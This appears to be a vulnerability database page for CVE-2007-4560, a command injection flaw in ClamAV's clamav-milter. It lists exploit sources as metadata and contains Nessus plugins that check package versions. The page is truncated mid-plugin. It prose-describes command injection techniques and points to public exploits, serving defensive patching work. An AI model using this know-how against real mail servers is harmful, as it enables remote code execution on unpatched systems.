Vulnerabilities > CVE-2007-4560 - OS Command Injection vulnerability in Clam Anti-Virus Clamav
Attack vector | UNKNOWN |
Attack complexity | UNKNOWN |
Privileges required | UNKNOWN |
Confidentiality impact | UNKNOWN |
Integrity impact | UNKNOWN |
Availability impact | UNKNOWN |
Summary
clamav-milter in ClamAV before 0.91.2, when run in black hole mode, allows remote attackers to execute arbitrary commands via shell metacharacters that are used in a certain popen call, involving the "recipient field of sendmail."
Vulnerable Configurations
Part | Description | Count |
---|---|---|
Application | | 1 |
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Command Line Execution through SQL Injection: An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Some time later, an unscrupulous backend application (which could be part of the functionality of the same application) fetches the injected data stored in the database and uses it as command line arguments without performing proper validation. The malicious data escapes the data plane by spawning new commands to be executed on the host.
- Command Delimiters: An attack of this type exploits a program's vulnerabilities that allow an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. A system that uses a filter or blacklist for input validation, as opposed to whitelist validation, is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or blacklist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.
- Exploiting Multiple Input Interpretation Layers: An attacker supplies the target software with input data that contains sequences of special characters designed to bypass input validation logic. This exploit relies on the target making multiple passes over the input data and processing a "layer" of special characters with each pass. In this manner, the attacker can disguise input that would otherwise be rejected as invalid by concealing it with layers of special/escape characters that are stripped off by subsequent processing steps. The goal is to first discover cases where the input validation layer executes before one or more parsing layers. That is, user input may go through the following logic in an application: In such cases, the attacker will need to provide input that will pass through the input validator, but after passing through parser2, will be converted into something that the input validator was supposed to stop.
- Argument Injection: An attacker changes the behavior or state of a targeted application by injecting data or command syntax through the target's use of non-validated and non-filtered arguments of exposed services or methods.
- OS Command Injection: In this type of attack, an adversary injects operating system commands into existing application functions. An application that uses untrusted input to build command strings is vulnerable. An adversary can leverage OS command injection in an application to elevate privileges, execute arbitrary commands and compromise the underlying operating system.
Exploit-Db
description | ClamAV Milter. CVE-2007-4560. Remote exploits for multiple platform |
id | EDB-ID:9913 |
last seen | 2016-02-01 |
modified | 2007-08-24 |
published | 2007-08-24 |
reporter | patrick |
source | https://www.exploit-db.com/download/9913/ |
title | ClamAV Milter <= 0.92.2 - Blackhole-Mode sendmail Code Execution |

description | ClamAV Milter Blackhole-Mode Remote Code Execution. CVE-2007-4560. Remote exploit for linux platform |
id | EDB-ID:16924 |
last seen | 2016-02-02 |
modified | 2010-10-09 |
published | 2010-10-09 |
reporter | metasploit |
source | https://www.exploit-db.com/download/16924/ |
title | ClamAV Milter Blackhole-Mode Remote Code Execution |
Metasploit
description | This module exploits a flaw in the Clam AntiVirus suite 'clamav-milter' (Sendmail mail filter). Versions prior to v0.92.2 are vulnerable. When implemented with black hole mode enabled, it is possible to execute commands remotely due to an insecure popen call. |
id | MSF:EXPLOIT/UNIX/SMTP/CLAMAV_MILTER_BLACKHOLE |
last seen | 2020-01-16 |
modified | 2017-11-08 |
published | 2008-03-17 |
references | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4560 |
reporter | Rapid7 |
source | https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/smtp/clamav_milter_blackhole.rb |
title | ClamAV Milter Blackhole-Mode Remote Code Execution |
Nessus
NASL family | Gentoo Local Security Checks |
NASL id | GENTOO_GLSA-200709-14.NASL |
description | The remote host is affected by the vulnerability described in GLSA-200709-14 (ClamAV: Multiple vulnerabilities) Nikolaos Rangos discovered a vulnerability in ClamAV which exists because the recipient address extracted from email messages is not properly sanitized before being used in a call to |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 26104 |
published | 2007-09-24 |
reporter | This script is Copyright (C) 2007-2019 Tenable Network Security, Inc. |
source | https://www.tenable.com/plugins/nessus/26104 |
title | GLSA-200709-14 : ClamAV: Multiple vulnerabilities |
code |

```nasl
#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Gentoo Linux Security Advisory GLSA 200709-14.
#
# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.
# and licensed under the Creative Commons - Attribution / Share Alike
# license. See http://creativecommons.org/licenses/by-sa/3.0/
#

include("compat.inc");

if (description)
{
  script_id(26104);
  script_version("1.13");
  script_cvs_date("Date: 2019/08/02 13:32:44");

  script_cve_id("CVE-2007-4510", "CVE-2007-4560");
  script_xref(name:"GLSA", value:"200709-14");

  script_name(english:"GLSA-200709-14 : ClamAV: Multiple vulnerabilities");
  script_summary(english:"Checks for updated package(s) in /var/db/pkg");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote Gentoo host is missing one or more security-related patches."
  );
  script_set_attribute(
    attribute:"description",
    value:
"The remote host is affected by the vulnerability described in GLSA-200709-14
(ClamAV: Multiple vulnerabilities)

  Nikolaos Rangos discovered a vulnerability in ClamAV which exists
  because the recipient address extracted from email messages is not
  properly sanitized before being used in a call to 'popen()' when
  executing sendmail (CVE-2007-4560). Also, NULL pointer dereference
  errors exist within the 'cli_scanrtf()' function in libclamav/rtf.c
  and Stefanos Stamatis discovered a NULL pointer dereference
  vulnerability within the 'cli_html_normalise()' function in
  libclamav/htmlnorm.c (CVE-2007-4510).

Impact :

  The unsanitized recipient address can be exploited to execute
  arbitrary code with the privileges of the clamav-milter process by
  sending an email with a specially crafted recipient address to the
  affected system. Also, the NULL pointer dereference errors can be
  exploited to crash ClamAV. Successful exploitation of the latter
  vulnerability requires that clamav-milter is started with the 'black
  hole' mode activated, which is not enabled by default.

Workaround :

  There is no known workaround at this time."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://security.gentoo.org/glsa/200709-14"
  );
  script_set_attribute(
    attribute:"solution",
    value:
"All ClamAV users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot --verbose '>=app-antivirus/clamav-0.91.2'"
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'ClamAV Milter Blackhole-Mode Remote Code Execution');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:'D2ExploitPack');
  script_cwe_id(78);

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:clamav");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux");

  script_set_attribute(attribute:"patch_publication_date", value:"2007/09/20");
  script_set_attribute(attribute:"plugin_publication_date", value:"2007/09/24");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2007-2019 Tenable Network Security, Inc.");
  script_family(english:"Gentoo Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list");

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("qpkg.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Gentoo/release")) audit(AUDIT_OS_NOT, "Gentoo");
if (!get_kb_item("Host/Gentoo/qpkg-list")) audit(AUDIT_PACKAGE_LIST_MISSING);


flag = 0;

if (qpkg_check(package:"app-antivirus/clamav", unaffected:make_list("ge 0.91.2"), vulnerable:make_list("lt 0.91.2"))) flag++;

if (flag)
{
  if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());
  else security_hole(0);
  exit(0);
}
else
{
  tested = qpkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "ClamAV");
}
```
NASL family | Fedora Local Security Checks |
NASL id | FEDORA_2007-2050.NASL |
description | - Sat Aug 25 2007 Enrico Scholz <enrico.scholz at informatik.tu-chemnitz.de> - 0.91.2-2 - fixed an open(2) issue - Sat Aug 25 2007 Enrico Scholz <enrico.scholz at informatik.tu-chemnitz.de> - 0.91.2-1 - updated to 0.91.2 (SECURITY) : - CVE-2007-4510 DOS in RTF parser - DOS in html normalizer - arbitrary command execution by special crafted recipients in clamav-milter |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 27747 |
published | 2007-11-06 |
reporter | This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof. |
source | https://www.tenable.com/plugins/nessus/27747 |
title | Fedora 7 : clamav-0.91.2-2.fc7 (2007-2050) |
code |

```nasl
#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Fedora Security Advisory 2007-2050.
#

include("compat.inc");

if (description)
{
  script_id(27747);
  script_version ("1.14");
  script_cvs_date("Date: 2019/08/02 13:32:25");

  script_cve_id("CVE-2007-4510", "CVE-2007-4560");
  script_bugtraq_id(25398, 25439);
  script_xref(name:"FEDORA", value:"2007-2050");

  script_name(english:"Fedora 7 : clamav-0.91.2-2.fc7 (2007-2050)");
  script_summary(english:"Checks rpm output for the updated packages.");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote Fedora host is missing a security update."
  );
  script_set_attribute(
    attribute:"description",
    value:
"  - Sat Aug 25 2007 Enrico Scholz <enrico.scholz at
    informatik.tu-chemnitz.de> - 0.91.2-2

    - fixed an open(2) issue

  - Sat Aug 25 2007 Enrico Scholz <enrico.scholz at
    informatik.tu-chemnitz.de> - 0.91.2-1

    - updated to 0.91.2 (SECURITY) :

    - CVE-2007-4510 DOS in RTF parser

    - DOS in html normalizer

    - arbitrary command execution by special crafted
      recipients in clamav-milter's black-hole mode

Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues."
  );
  # https://lists.fedoraproject.org/pipermail/package-announce/2007-September/003629.html
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?fc903132"
  );
  script_set_attribute(attribute:"solution", value:"Update the affected packages.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'ClamAV Milter Blackhole-Mode Remote Code Execution');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:'D2ExploitPack');
  script_cwe_id(78);

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:clamav");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:clamav-data");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:clamav-data-empty");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:clamav-debuginfo");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:clamav-devel");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:clamav-filesystem");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:clamav-lib");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:clamav-milter");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:clamav-milter-sysv");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:clamav-server");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:clamav-server-sysv");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:clamav-update");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:7");

  script_set_attribute(attribute:"patch_publication_date", value:"2007/09/07");
  script_set_attribute(attribute:"plugin_publication_date", value:"2007/11/06");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Fedora Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list");

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora");
os_ver = eregmatch(pattern: "Fedora.*release ([0-9]+)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora");
os_ver = os_ver[1];
if (! ereg(pattern:"^7([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 7.x", "Fedora " + os_ver);

if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu);


flag = 0;
if (rpm_check(release:"FC7", reference:"clamav-0.91.2-2.fc7")) flag++;
if (rpm_check(release:"FC7", reference:"clamav-data-0.91.2-2.fc7")) flag++;
if (rpm_check(release:"FC7", reference:"clamav-data-empty-0.91.2-2.fc7")) flag++;
if (rpm_check(release:"FC7", reference:"clamav-debuginfo-0.91.2-2.fc7")) flag++;
if (rpm_check(release:"FC7", reference:"clamav-devel-0.91.2-2.fc7")) flag++;
if (rpm_check(release:"FC7", reference:"clamav-filesystem-0.91.2-2.fc7")) flag++;
if (rpm_check(release:"FC7", reference:"clamav-lib-0.91.2-2.fc7")) flag++;
if (rpm_check(release:"FC7", reference:"clamav-milter-0.91.2-2.fc7")) flag++;
if (rpm_check(release:"FC7", reference:"clamav-milter-sysv-0.91.2-2.fc7")) flag++;
if (rpm_check(release:"FC7", reference:"clamav-server-0.91.2-2.fc7")) flag++;
if (rpm_check(release:"FC7", reference:"clamav-server-sysv-0.91.2-2.fc7")) flag++;
if (rpm_check(release:"FC7", reference:"clamav-update-0.91.2-2.fc7")) flag++;


if (flag)
{
  if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
  else security_hole(0);
  exit(0);
}
else
{
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "clamav / clamav-data / clamav-data-empty / clamav-debuginfo / etc");
}
```
NASL family | MacOS X Local Security Checks |
NASL id | MACOSX_SECUPD2008-002.NASL |
description | The remote host is running a version of Mac OS X 10.5 or 10.4 that does not have the security update 2008-002 applied. This update contains several security fixes for a number of programs. |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 31605 |
published | 2008-03-19 |
reporter | This script is Copyright (C) 2008-2018 Tenable Network Security, Inc. |
source | https://www.tenable.com/plugins/nessus/31605 |
title | Mac OS X Multiple Vulnerabilities (Security Update 2008-002) |
code |

```nasl
#
# (C) Tenable Network Security, Inc.
#

if (!defined_func("bn_random")) exit(0);
if (NASL_LEVEL < 3004) exit(0);

include("compat.inc");

if (description)
{
  script_id(31605);
  script_version ("1.38");
  script_cvs_date("Date: 2018/07/14 1:59:35");

  script_cve_id("CVE-2005-3352", "CVE-2005-4077", "CVE-2006-3334", "CVE-2006-3747",
                "CVE-2006-5793", "CVE-2006-6481", "CVE-2007-0897", "CVE-2007-0898",
                "CVE-2007-1659", "CVE-2007-1660", "CVE-2007-1661", "CVE-2007-1662",
                "CVE-2007-1745", "CVE-2007-1997", "CVE-2007-2445", "CVE-2007-2799",
                "CVE-2007-3378", "CVE-2007-3725", "CVE-2007-3799", "CVE-2007-3847",
                "CVE-2007-4510", "CVE-2007-4560", "CVE-2007-4568", "CVE-2007-4752",
                "CVE-2007-4766", "CVE-2007-4767", "CVE-2007-4768", "CVE-2007-4887",
                "CVE-2007-4990", "CVE-2007-5000", "CVE-2007-5266", "CVE-2007-5267",
                "CVE-2007-5268", "CVE-2007-5269", "CVE-2007-5795", "CVE-2007-5901",
                "CVE-2007-5958", "CVE-2007-5971", "CVE-2007-6109", "CVE-2007-6203",
                "CVE-2007-6335", "CVE-2007-6336", "CVE-2007-6337", "CVE-2007-6388",
                "CVE-2007-6421", "CVE-2007-6427", "CVE-2007-6428", "CVE-2007-6429",
                "CVE-2008-0005", "CVE-2008-0006", "CVE-2008-0044", "CVE-2008-0045",
                "CVE-2008-0046", "CVE-2008-0047", "CVE-2008-0048", "CVE-2008-0049",
                "CVE-2008-0050", "CVE-2008-0051", "CVE-2008-0052", "CVE-2008-0053",
                "CVE-2008-0054", "CVE-2008-0055", "CVE-2008-0056", "CVE-2008-0057",
                "CVE-2008-0058", "CVE-2008-0059", "CVE-2008-0060", "CVE-2008-0062",
                "CVE-2008-0063", "CVE-2008-0318", "CVE-2008-0596", "CVE-2008-0728",
                "CVE-2008-0882", "CVE-2008-0987", "CVE-2008-0988", "CVE-2008-0989",
                "CVE-2008-0990", "CVE-2008-0992", "CVE-2008-0993", "CVE-2008-0994",
                "CVE-2008-0995", "CVE-2008-0996", "CVE-2008-0997", "CVE-2008-0998",
                "CVE-2008-0999", "CVE-2008-1000");
  script_bugtraq_id(19204, 21078, 24268, 25398, 25439, 25489, 25498, 26346, 26750,
                    26838, 26927, 26946, 27234, 27236, 27751, 27988, 28278, 28303,
                    28304, 28307, 28320, 28323, 28334, 28339, 28340, 28341, 28343,
                    28344, 28345, 28357, 28358, 28359, 28363, 28364, 28365, 28367,
                    28368, 28371, 28371, 28372, 28374, 28375, 28384, 28385, 28386,
                    28387, 28388, 28389);

  script_name(english:"Mac OS X Multiple Vulnerabilities (Security Update 2008-002)");
  script_summary(english:"Check for the presence of Security Update 2008-002");

  script_set_attribute(attribute:"synopsis", value:
"The remote host is missing a Mac OS X update that fixes various
security issues." );
  script_set_attribute(attribute:"description", value:
"The remote host is running a version of Mac OS X 10.5 or 10.4 that
does not have the security update 2008-002 applied.

This update contains several security fixes for a number of programs." );
  script_set_attribute(attribute:"see_also", value:"http://docs.info.apple.com/article.html?artnum=307562" );
  script_set_attribute(attribute:"see_also", value:"http://lists.apple.com/archives/security-announce/2008/Mar/msg00001.html" );
  script_set_attribute(attribute:"see_also", value:"http://www.securityfocus.com/advisories/14242" );
  script_set_attribute(attribute:"solution", value:
"Install Security Update 2008-002 or later." );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'ClamAV Milter Blackhole-Mode Remote Code Execution');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:'CANVAS');
  script_cwe_id(20, 22, 78, 79, 94, 119, 134, 189, 200, 255, 264, 362, 399);

  script_set_attribute(attribute:"plugin_publication_date", value: "2008/03/19");
  script_set_attribute(attribute:"patch_publication_date", value: "2007/08/24");
  script_set_attribute(attribute:"vuln_publication_date", value: "2007/06/02");
  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:apple:mac_os_x");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"MacOS X Local Security Checks");
  script_copyright(english:"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.");
  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/MacOSX/packages", "Host/uname");
  exit(0);
}


uname = get_kb_item("Host/uname");
if (!uname) exit(0);

if (egrep(pattern:"Darwin.* (8\.[0-9]\.|8\.1[01]\.)", string:uname))
{
  packages = get_kb_item("Host/MacOSX/packages");
  if (!packages) exit(0);

  if (!egrep(pattern:"^SecUpd(Srvr)?(2008-00[2-8]|2009-|20[1-9][0-9]-)", string:packages))
    security_hole(0);
}
else if (egrep(pattern:"Darwin.* (9\.[0-2]\.)", string:uname))
{
  packages = get_kb_item("Host/MacOSX/packages/boms");
  if (!packages) exit(0);

  if (!egrep(pattern:"^com\.apple\.pkg\.update\.security\.2008\.002\.bom", string:packages))
    security_hole(0);
}
```
NASL family | Mandriva Local Security Checks |
NASL id | MANDRAKE_MDKSA-2007-172.NASL |
description | A vulnerability in ClamAV was discovered that could allow remote attackers to cause a denial of service via a crafted RTF file or a crafted HTML document with a data: URI, both of which trigger a NULL dereference (CVE-2007-4510). A vulnerability in clamav-milter, when run in black hole mode, could allow remote attackers to execute arbitrary commands via shell metacharacters that are used in a certain popen call (CVE-2007-4560). Other bugs have also been corrected in 0.91.2 which is being provided with this update. |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 25969 |
published | 2007-09-03 |
reporter | This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof. |
source | https://www.tenable.com/plugins/nessus/25969 |
title | Mandrake Linux Security Advisory : clamav (MDKSA-2007:172) |
code |

```nasl
#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Mandrake Linux Security Advisory MDKSA-2007:172.
# The text itself is copyright (C) Mandriva S.A.
#

include("compat.inc");

if (description)
{
  script_id(25969);
  script_version ("1.18");
  script_cvs_date("Date: 2019/08/02 13:32:49");

  script_cve_id("CVE-2007-4510", "CVE-2007-4560");
  script_bugtraq_id(25398, 25439);
  script_xref(name:"MDKSA", value:"2007:172");

  script_name(english:"Mandrake Linux Security Advisory : clamav (MDKSA-2007:172)");
  script_summary(english:"Checks rpm output for the updated packages");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote Mandrake Linux host is missing one or more security updates."
  );
  script_set_attribute(
    attribute:"description",
    value:
"A vulnerability in ClamAV was discovered that could allow remote
attackers to cause a denial of service via a crafted RTF file or a
crafted HTML document with a data: URI, both of which trigger a NULL
dereference (CVE-2007-4510).

A vulnerability in clamav-milter, when run in black hole mode, could
allow remote attackers to execute arbitrary commands via shell
metacharacters that are used in a certain popen call (CVE-2007-4560).

Other bugs have also been corrected in 0.91.2 which is being provided
with this update."
  );
  script_set_attribute(attribute:"solution", value:"Update the affected packages.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'ClamAV Milter Blackhole-Mode Remote Code Execution');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:'D2ExploitPack');
  script_cwe_id(78);

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:clamav");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:clamav-db");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:clamav-milter");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:clamd");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:clamdmon");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:lib64clamav-devel");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:lib64clamav2");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:libclamav-devel");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:libclamav2");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:mandriva:linux:2007");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:mandriva:linux:2007.1");

  script_set_attribute(attribute:"patch_publication_date", value:"2007/08/31");
  script_set_attribute(attribute:"plugin_publication_date", value:"2007/09/03");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Mandriva Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/Mandrake/release", "Host/Mandrake/rpm-list");

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Mandrake/release")) audit(AUDIT_OS_NOT, "Mandriva / Mandake Linux");
if (!get_kb_item("Host/Mandrake/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if (cpu !~ "^(amd64|i[3-6]86|x86_64)$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Mandriva / Mandrake Linux", cpu);


flag = 0;
if (rpm_check(release:"MDK2007.0", reference:"clamav-0.91.2-1.1mdv2007.0", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2007.0", reference:"clamav-db-0.91.2-1.1mdv2007.0", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2007.0", reference:"clamav-milter-0.91.2-1.1mdv2007.0", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2007.0", reference:"clamd-0.91.2-1.1mdv2007.0", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2007.0", reference:"clamdmon-0.91.2-1.1mdv2007.0", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2007.0", cpu:"x86_64", reference:"lib64clamav-devel-0.91.2-1.1mdv2007.0", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2007.0", cpu:"x86_64", reference:"lib64clamav2-0.91.2-1.1mdv2007.0", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2007.0", cpu:"i386", reference:"libclamav-devel-0.91.2-1.1mdv2007.0", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2007.0", cpu:"i386", reference:"libclamav2-0.91.2-1.1mdv2007.0", yank:"mdv")) flag++;

if (rpm_check(release:"MDK2007.1", reference:"clamav-0.91.2-1.1mdv2007.1", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2007.1", reference:"clamav-db-0.91.2-1.1mdv2007.1", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2007.1", reference:"clamav-milter-0.91.2-1.1mdv2007.1", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2007.1", reference:"clamd-0.91.2-1.1mdv2007.1", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2007.1", reference:"clamdmon-0.91.2-1.1mdv2007.1", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2007.1", cpu:"x86_64", reference:"lib64clamav-devel-0.91.2-1.1mdv2007.1", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2007.1", cpu:"x86_64", reference:"lib64clamav2-0.91.2-1.1mdv2007.1", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2007.1", cpu:"i386", reference:"libclamav-devel-0.91.2-1.1mdv2007.1", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2007.1", cpu:"i386", reference:"libclamav2-0.91.2-1.1mdv2007.1", yank:"mdv")) flag++;


if (flag)
{
  if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
  else security_hole(0);
  exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");
```
NASL family | Debian Local Security Checks |
NASL id | DEBIAN_DSA-1366.NASL |
description | Several remote vulnerabilities have been discovered in the Clam anti-virus toolkit. The Common Vulnerabilities and Exposures project identifies the following problems : - CVE-2007-4510 It was discovered that the RTF and RFC2397 parsers can be tricked into dereferencing a NULL pointer, resulting in denial of service. - CVE-2007-4560 It was discovered that clamav-milter performs insufficient input sanitising, resulting in the execution of arbitrary shell commands. The oldstable distribution (sarge) is only affected by a subset of the problems. An update will be provided later. |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 25966 |
published | 2007-09-03 |
reporter | This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof. |
source | https://www.tenable.com/plugins/nessus/25966 |
title | Debian DSA-1366-1 : clamav - several vulnerabilities |
code |

```nasl
#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Debian Security Advisory DSA-1366. The text
# itself is copyright (C) Software in the Public Interest, Inc.
#

include("compat.inc");

if (description)
{
  script_id(25966);
  script_version("1.20");
  script_cvs_date("Date: 2019/08/02 13:32:20");

  script_cve_id("CVE-2007-4510", "CVE-2007-4560");
